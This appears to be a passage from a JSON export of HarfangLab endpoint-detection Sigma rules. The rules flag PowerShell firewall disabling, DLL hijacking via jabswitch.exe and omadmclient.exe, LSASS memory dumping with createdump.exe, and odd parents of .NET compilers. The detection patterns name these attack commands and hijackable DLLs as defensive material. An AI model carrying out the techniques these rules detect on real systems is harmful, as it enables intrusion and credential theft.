"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087014Z",
"creation_date": "2026-03-23T11:45:34.087016Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087020Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/",
"https://attack.mitre.org/techniques/T1562/004/"
],
"name": "t1562_004_powershell_disable_firewall.yml",
"content": "title: Windows Firewall Disabled via PowerShell in Command-line\nid: 867512a0-7df8-460e-a3f5-0adf633ba816\ndescription: |\n Detects PowerShell commandlets in command-line mode used to disable the Windows firewall.\n Attackers may disable the Windows firewall to gain unauthorized access to a system or network, bypass security measures and ease future access to compromised systems.\n It is recommended to analyze the context (parent process, ancestors) around this execution of PowerShell to determine whether the disabling of the firewall is the consequence of a legitimate IT policy or the result of malicious actions.\nreferences:\n - https://www.winhelponline.com/blog/enable-and-disable-windows-firewall-quickly-using-command-line/\n - https://attack.mitre.org/techniques/T1562/004/\ndate: 2021/05/07\nmodified: 2025/02/07\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.SystemModification\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_cmd:\n CommandLine|contains|all:\n - 'Set-NetFirewallProfile'\n - '-Enabled'\n - 'false'\n\n selection_profile:\n CommandLine|contains:\n - '-All'\n - '-Profile'\n\n condition: all of selection_*\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "867512a0-7df8-460e-a3f5-0adf633ba816",
"rule_name": "Windows Firewall Disabled via PowerShell in Command-line",
"rule_description": "Detects PowerShell commandlets in command-line mode used to disable the Windows firewall.\nAttackers may disable the Windows firewall to gain unauthorized access to a system or network, bypass security measures and ease future access to compromised systems.\nIt is recommended to analyze the context (parent process, ancestors) around this execution of PowerShell to determine whether the disabling of the firewall is the consequence of a legitimate IT policy or the result of malicious actions.\n",
"rule_creation_date": "2021-05-07",
"rule_modified_date": "2025-02-07",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "867c41de-ac3a-4ccf-9f21-8c290e5f35b1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086696Z",
"creation_date": "2026-03-23T11:45:34.086698Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086702Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms",
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_jabswitch.yml",
"content": "title: DLL Hijacking via jabswitch.exe\nid: 867c41de-ac3a-4ccf-9f21-8c290e5f35b1\ndescription: |\n Detects potential Windows DLL Hijacking via jabswitch.exe, which is part of the Java SE8 Runtime Environment.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate, signed third-party binary to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/iran-apt-seedworm-africa-telecoms\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2024/01/08\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'jabswitch.exe'\n ImageLoaded|endswith:\n - '\\VERSION.dll'\n - '\\vcruntime140.dll'\n - '\\MSVCR100.dll'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_image:\n ImageLoaded|startswith:\n - '?:\\Program Files (x86)\\Java\\jre'\n - '?:\\Program Files (x86)\\Java\\jdk'\n - '?:\\Program Files\\Java\\jre'\n - '?:\\Program Files\\Java\\jdk'\n\n filter_signed_imageloaded:\n Signed: 'true'\n SignatureStatus: 'Valid'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft 
Corporation'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows Software Compatibility Publisher'\n - 'Oracle America, Inc.'\n - 'Eclipse.org Foundation, Inc.'\n - 'Amazon.com Services LLC' # C:\\Program Files\\Amazon Corretto\\jdk1.8.0_422\\jre\\bin\\jabswitch.exe\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "867c41de-ac3a-4ccf-9f21-8c290e5f35b1",
"rule_name": "DLL Hijacking via jabswitch.exe",
"rule_description": "Detects potential Windows DLL Hijacking via jabswitch.exe, which is part of the Java SE8 Runtime Environment.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers have used this technique by copying a legitimate, signed third-party binary to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2024-01-08",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "869b436c-0aaf-41f9-aad5-edb0d72e4f92",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-24T07:14:08.571154Z",
"creation_date": "2026-03-23T11:45:34.618391Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618395Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://twitter.com/ShitSecure/status/1590655082864906240",
"https://strontic.github.io/xcyclopedia/library/createdump.exe-0464C3912C3B38C27F5DD2D64E09B0BF.html",
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1003_001_process_memory_dump_with_createdump.yml",
"content": "title: Process Memory Dumped via createdump.exe\nid: 869b436c-0aaf-41f9-aad5-edb0d72e4f92\ndescription: |\n Detects a suspicious attempt to dump a process' memory using createdump.exe, the .NET Crash Dump Generator.\n This binary can be used as a LOLBin in order to dump the LSASS' process memory.\n Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\n These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\n It is recommended to analyze the parent process for suspicious activities, investigate any further malicious actions on the host and to start memory forensics to determine materials stolen from memory.\nreferences:\n - https://twitter.com/ShitSecure/status/1590655082864906240\n - https://strontic.github.io/xcyclopedia/library/createdump.exe-0464C3912C3B38C27F5DD2D64E09B0BF.html\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Createdump/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2022/11/14\nmodified: 2026/03/20\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - attack.t1078\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.CreateDump\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.SensitiveInformation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\createdump.exe'\n - Description: 'Microsoft .NET Runtime Crash Dump Generator'\n\n # Arguments are required\n selection_commandline:\n CommandLine|contains: ' '\n\n exclusion_squirreltemp:\n Image|endswith: '\\AppData\\Local\\\\*\\app-*\\createdump.exe'\n ParentImage|endswith: '\\AppData\\Local\\SquirrelTemp\\Update.exe'\n\n exclusion_kenora:\n Image|contains: '\\Kenora.GSST.Instrument.Client\\'\n\n exclusion_vistasoft:\n ParentImage: 
'?:\\Program Files\\Duerr\\VistaSoft\\Binaries\\Duerr.DigitalDiagnostics.Applications.VistaSoft.WorkstationService.exe'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "869b436c-0aaf-41f9-aad5-edb0d72e4f92",
"rule_name": "Process Memory Dumped via createdump.exe",
"rule_description": "Detects a suspicious attempt to dump a process' memory using createdump.exe, the .NET Crash Dump Generator.\nThis binary can be used as a LOLBin in order to dump the LSASS' process memory.\nAdversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS).\nThese credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement or Privilege Escalation.\nIt is recommended to analyze the parent process for suspicious activities, investigate any further malicious actions on the host and to start memory forensics to determine materials stolen from memory.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-03-20",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1078"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "86b6d127-f438-4d94-8754-6dc95226d73d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617981Z",
"creation_date": "2026-03-23T11:45:34.617983Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617987Z",
"rule_level": "low",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1204/"
],
"name": "t1204_harfanglab_eicar_macos.yml",
"content": "title: Harfanglab EICAR (macOS)\nid: 86b6d127-f438-4d94-8754-6dc95226d73d\ndescription: |\n This is a test rule that detects the string 'EICAR-STANDARD-HARFANGLAB-TEST-STRING' inside the command-line of a process.\n EICAR files are files that were originally used to test the response of computer AV programs. HarfangLab has used this concept to create a test rule for its EDR.\n This does not represent inherently malicious activity and there should be no need for investigation if these tests are expected in your environment.\n If this rule has triggered, it means that HarfangLab EDR detection engines are operating properly.\nreferences:\n - https://attack.mitre.org/techniques/T1204/\ndate: 2023/11/30\nmodified: 2025/01/27\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Malware.EICAR\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n CommandLine|contains: 'EICAR-STANDARD-HARFANGLAB-TEST-STRING'\n condition: selection\nlevel: low\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "86b6d127-f438-4d94-8754-6dc95226d73d",
"rule_name": "Harfanglab EICAR (macOS)",
"rule_description": "This is a test rule that detects the string 'EICAR-STANDARD-HARFANGLAB-TEST-STRING' inside the command-line of a process.\nEICAR files are files that were originally used to test the response of computer AV programs. HarfangLab has used this concept to create a test rule for its EDR.\nThis does not represent inherently malicious activity and there should be no need for investigation if these tests are expected in your environment.\nIf this rule has triggered, it means that HarfangLab EDR detection engines are operating properly.\n",
"rule_creation_date": "2023-11-30",
"rule_modified_date": "2025-01-27",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "86d4bfcf-b95a-4574-ae9a-bb54d1a857ec",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.624357Z",
"creation_date": "2026-03-23T11:45:34.624359Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.624363Z",
"rule_level": "medium",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1027/004/"
],
"name": "t1027_004_suspicious_process_parent_csc.yml",
"content": "title: Suspicious parent process for .NET code compiler\nid: 86d4bfcf-b95a-4574-ae9a-bb54d1a857ec\ndescription: |\n Detects an uncommon process launching csc.exe or vbc.exe. These binaries are used to compile .NET code.\n Attackers may compile their payload directly on the compromised host to bypass defense mechanism.\n It is recommended to check the processes tree for suspicious execution after the compilation.\nreferences:\n - https://attack.mitre.org/techniques/T1027/004/\ndate: 2021/06/18\nmodified: 2025/11/28\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1027.004\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Csc\n - classification.Windows.LOLBin.Vbc\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_process:\n - Image|endswith:\n - '\\csc.exe'\n - '\\vbc.exe'\n - OriginalFileName:\n - 'csc.exe'\n - 'vbc.exe'\n\n selection_parentimage:\n ParentImage|endswith:\n - '\\cmd.exe'\n - '\\wscript.exe'\n - '\\cscript.exe'\n - '\\mshta.exe'\n - '\\wmic.exe'\n - '\\svchost.exe'\n - '\\rundll32.exe'\n - '\\regsvr32.exe'\n - '\\cmstp.exe'\n\n selection_powershell:\n ParentImage|endswith: '\\powershell.exe'\n\n # Avoid false positive when PowerShell use cmdlet Add-Type.\n selection_powershell_commandline:\n CommandLine|contains: ' /noconfig /fullpaths '\n\n exclusion_grandparent:\n GrandparentImage:\n - '?:\\Program Files\\NAKIVO Backup & Replication\\transporter\\bh.exe'\n - '?:\\Program Files\\Windows Defender Advanced Threat Protection\\SenseIR.exe'\n - '?:\\Windows\\System32\\svchost.exe'\n - '?:\\Windows\\System32\\RuntimeBroker.exe'\n - '?:\\Program Files\\CYBERWATCH SAS\\CyberwatchAgent\\cyberwatch-agent.exe'\n - '?:\\Program Files (x86)\\Symantec\\Symantec Endpoint Protection\\\\*\\Bin\\ccSvcHst.exe'\n\n exclusion_commandline:\n CommandLine|contains:\n - '?:\\Windows\\system32\\cmd.exe /c D:\\\\*\\\\*.BAT'\n - 
'?:\\Windows\\SysWOW64\\cscript.exe D:\\\\*\\\\*.vbs'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -noProfile -File D:\\\\*\\\\*.ps1'\n\n exclusion_vscode:\n GrandparentImage|endswith:\n - '\\Microsoft VS Code\\Code.exe'\n - '\\Microsoft.Sara.exe'\n\n # rufus-3.14.exe\n exclusion_rufus:\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains|all:\n - '\\AppData\\Local\\Temp\\Rufus.ico'\n - '-AppTitle'\n\n exclusion_chocolatey:\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains|all:\n - 'DownloadString'\n - 'chocolatey.org'\n\n exclusion_ad_health_adfs_agent:\n # C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoExit -Command &{write-host Executing Elevated PowerShell Command: Register-AzureADConnectHealthADFSAgent; import-module $env:ProgramW6432\\Azure` Ad` Connect` Health` Adfs` Agent\\PowerShell\\AdHealthAdfs; Register-AzureADConnectHealthADFSAgent}\n ParentCommandLine|contains|all:\n - 'AdHealthAdfs'\n - 'Register-AzureADConnectHealthADFSAgent'\n\n exclusion_node:\n ParentImage|endswith: '\\powershell.exe'\n GrandparentImage: '?:\\Program Files\\nodejs\\node.exe'\n\n exclusion_unity:\n ParentImage|endswith: '\\cmd.exe'\n GrandparentImage:\n - '?:\\Program Files\\Unity\\Hub\\Editor\\\\*\\Editor\\Unity.exe'\n - '?:\\Program Files\\Unity\\Editor\\Unity.exe'\n\n exclusion_gitlab:\n ParentImage|endswith: '\\powershell.exe'\n GrandparentImage|endswith: '\\gitlab-runner.exe'\n\n exclusion_amazon_ec2_cmd:\n ParentImage|endswith: '\\powershell.exe'\n GrandparentImage|endswith: '\\cmd.exe'\n ParentCommandLine|contains|all:\n - '-NonInteractive'\n - '-ExecutionPolicy Unrestricted'\n - 'Import-Module'\n - '?:\\ProgramData\\Amazon\\EC2-Windows\\Launch\\Module\\'\n\n exclusion_amazon_ec2_powershell:\n ParentImage|endswith: '\\powershell.exe'\n GrandparentImage|endswith: '\\powershell.exe'\n GrandparentCommandLine|contains|all:\n - '-NonInteractive'\n - 
'-ExecutionPolicy Unrestricted'\n - 'Import-Module'\n - '?:\\ProgramData\\Amazon\\EC2-Windows\\Launch\\Module\\'\n\n exclusion_amazon_workspace:\n ParentImage|endswith: '\\powershell.exe'\n GrandparentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains|all:\n - '-NonInteractive'\n - '-ExecutionPolicy AllSigned'\n - '?:\\Program Files\\Amazon\\WorkSpacesConfig\\Scripts\\'\n\n exclusion_rmm_agent:\n # C:\\WINDOWS\\sysnative\\windowspowershell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File \"C:\\ProgramData\\NinjaRMMAgent\\scripting\\customscript_gen_4.ps1\"\n # C:\\WINDOWS\\sysnative\\windowspowershell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File \"C:\\ProgramData\\NinjaRMMAgent\\scripting\\customscript_gen_3.ps1\"\n # C:\\WINDOWS\\sysnative\\windowspowershell\\v1.0\\powershell.exe -ExecutionPolicy Bypass -File \"C:\\ProgramData\\NinjaRMMAgent\\scripting\\customscript_gen_2.ps1\"\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains: '?:\\ProgramData\\NinjaRMMAgent\\scripting'\n\n exclusion_intune:\n # \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -executionPolicy bypass -file \"C:\\Program Files (x86)\\Microsoft Intune Management Extension\\Policies\\Scripts\\22d3400d-2aa6-48d2-a41c-6c82142e62ff_0563412a-11dc-470c-a210-f9f2ff33ccb9.ps1\"\n ParentImage|endswith: '\\powershell.exe'\n ParentCommandLine|contains: '?:\\Program Files (x86)\\Microsoft Intune Management Extension\\Policies\\Scripts\\'\n\n exclusion_bootxray:\n ParentImage|endswith: '\\powershell.exe'\n # powershell.exe -ExecutionPolicy Bypass -Command &{Import-Module (Join-Path $env:ProgramData 'Microsoft Services BootXRay\\BxrR') ; Invoke-BxrR__PostBootActions2 }\n ParentCommandLine|contains|all:\n - 'Import-Module'\n - 'Microsoft Services BootXRay\\BxrR'\n - 'Invoke-BxrR'\n GrandparentImage|endswith: '\\cmd.exe'\n # C:\\WINDOWS\\system32\\cmd.EXE /C C:\\ProgramData\\Microsoft Services 
BootXRay\\BxrR\\Resource\\Invoke-BxrR__PostBootActions1.bat 120 60\n GrandparentCommandLine|contains: '?:\\ProgramData\\Microsoft Services BootXRay\\BxrR\\Resource\\Invoke-BxrR'\n\n exclusion_dev:\n ParentCommandLine|contains: '?:\\Program Files\\Microsoft Visual Studio\\\\*\\VsDevCmd.bat'\n\n exclusion_installer:\n ProcessCommandLine|contains:\n - 'rundll32.exe ?:\\Users\\\\*\\AppData\\Local\\Temp\\MSI????.tmp,zzzzInvokeManagedCustomActionOutOfProc SfxCA_'\n - 'rundll32.exe ?:\\WINDOWS\\Installer\\MSI????.tmp,zzzzInvokeManagedCustomActionOutOfProc SfxCA_'\n\n condition: selection_process and ((selection_parentimage) or (selection_powershell and not selection_powershell_commandline)) and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "86d4bfcf-b95a-4574-ae9a-bb54d1a857ec",
"rule_name": "Suspicious parent process for .NET code compiler",
"rule_description": "Detects an uncommon process launching csc.exe or vbc.exe. These binaries are used to compile .NET code.\nAttackers may compile their payload directly on the compromised host to bypass defense mechanisms.\nIt is recommended to check the process tree for suspicious execution after the compilation.\n",
"rule_creation_date": "2021-06-18",
"rule_modified_date": "2025-11-28",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1027.004"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "86ec5e94-2fe7-4419-883a-d2a53ddfd4b2",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599354Z",
"creation_date": "2026-03-23T11:45:34.599357Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599365Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://github.com/xforcered/WFH",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_omadmclient.yml",
"content": "title: DLL Hijacking via omadmclient.exe\nid: 86ec5e94-2fe7-4419-883a-d2a53ddfd4b2\ndescription: |\n Detects potential Windows DLL Hijacking via omadmclient.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'omadmclient.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\coredplus.dll'\n - '\\cryptsp.dll'\n - '\\DEVOBJ.dll'\n - '\\DMCfgUtils.dll'\n - '\\DMCmnUtils.dll'\n - '\\dmEnrollEngine.DLL'\n - '\\dmenterprisediagnostics.dll'\n - '\\dmiso8601utils.dll'\n - '\\DMOleAutUtils.dll'\n - '\\dmxmlhelputils.dll'\n - '\\IPHLPAPI.DLL'\n - '\\iri.dll'\n - '\\msvcp110_win.dll'\n - '\\omadmapi.dll'\n - '\\policymanager.dll'\n - '\\profapi.dll'\n - '\\umpdc.dll'\n - '\\USERENV.dll'\n - '\\XmlLite.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n 
filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "86ec5e94-2fe7-4419-883a-d2a53ddfd4b2",
"rule_name": "DLL Hijacking via omadmclient.exe",
"rule_description": "Detects potential Windows DLL Hijacking via omadmclient.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "86f9066e-8897-465c-a981-974f87b66ed6",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.082549Z",
"creation_date": "2026-03-23T11:45:34.082551Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.082556Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
